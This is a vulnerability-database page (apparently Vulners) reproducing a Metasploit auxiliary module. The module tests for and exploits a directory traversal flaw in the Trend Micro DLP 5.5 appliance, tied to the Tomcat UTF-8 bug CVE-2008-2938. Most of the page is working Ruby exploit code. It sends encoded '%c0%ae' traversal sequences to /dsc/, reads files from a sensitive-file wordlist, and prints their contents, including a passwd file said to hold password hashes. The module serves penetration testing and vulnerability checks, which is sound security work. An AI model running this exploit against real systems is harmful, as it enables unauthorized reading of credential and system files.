Lucene search
K

TrendMicro Data Loss Prevention 5.5 Directory Traversal

🗓️ 22 Sep 2011 07:34:53Reported by aushack <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 79 Views

TrendMicro DLP 5.5 Directory Traversal vulnerability test modul

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name' => 'TrendMicro Data Loss Prevention 5.5 Directory Traversal',
      'Description' => %q{
        This module tests whether a directory traversal vulnerability is present
        in Trend Micro DLP (Data Loss Prevention) Appliance v5.5 build <= 1294.
        The vulnerability appears to be actually caused by the Tomcat UTF-8
        bug which is implemented in module tomcat_utf8_traversal CVE 2008-2938.
        This module simply tests for the same bug with Trend Micro specific settings.
        Note that in the Trend Micro appliance, /etc/shadow is not used and therefore
        password hashes are stored and anonymously accessible in the passwd file.
        },
      'References' => [
        [ 'URL', 'http://tomcat.apache.org/' ],
        [ 'OSVDB', '47464' ],
        [ 'OSVDB', '73447' ],
        [ 'CVE', '2008-2938' ],
        [ 'URL', 'http://www.securityfocus.com/archive/1/499926' ],
        [ 'EDB', '17388' ],
        [ 'BID', '48225' ],
      ],
      'Author' => [ 'aushack' ],
      'License' => MSF_LICENSE,
      'DisclosureDate' => 'Jan 9 2009'
    )

    register_options(
      [
        Opt::RPORT(8443),
        OptBool.new('SSL', [true, 'Use SSL', true]),
        OptPath.new('SENSITIVE_FILES', [
          true, 'File containing sensitive files, one per line',
          File.join(Msf::Config.data_directory, 'wordlists', 'sensitive_files.txt')
        ]),
      ]
    )
  end

  def extract_words(wordfile)
    return [] unless wordfile && File.readable?(wordfile)

    begin
      File.readlines(wordfile, chomp: true)
    rescue ::StandardError => e
      elog(e)
      []
    end
  end

  def find_files(files)
    traversal = '/%c0%ae%c0%ae'

    res = send_request_raw(
      {
        'method' => 'GET',
        'uri' => '/dsc/' + traversal * 10 + files # We know depth is 10
      }, 25
    )
    if (res && (res.code == 200))
      print_status("Request may have succeeded on #{rhost}:#{rport}:file->#{files}! Response: \r\n#{res.body}")
      @files_found << files
    elsif (res && res.code)
      vprint_status("Attempt returned HTTP error #{res.code} on #{rhost}:#{rport}:file->#{files}")
    end
  end

  def run_host(_ip)
    @files_found = []

    begin
      print_status("Attempting to connect to #{rhost}:#{rport}")
      res = send_request_raw(
        {
          'method' => 'GET',
          'uri' => '/dsc/'
        }, 25
      )

      if res
        extract_words(datastore['SENSITIVE_FILES']).each do |files|
          find_files(files) unless files.empty?
        end
      end

      if !@files_found.empty?
        print_good('File(s) found:')

        @files_found.each do |f|
          print_good(f)
        end
      else
        print_error('No File(s) found')
      end
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
    rescue ::Timeout::Error, ::Errno::EPIPE
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation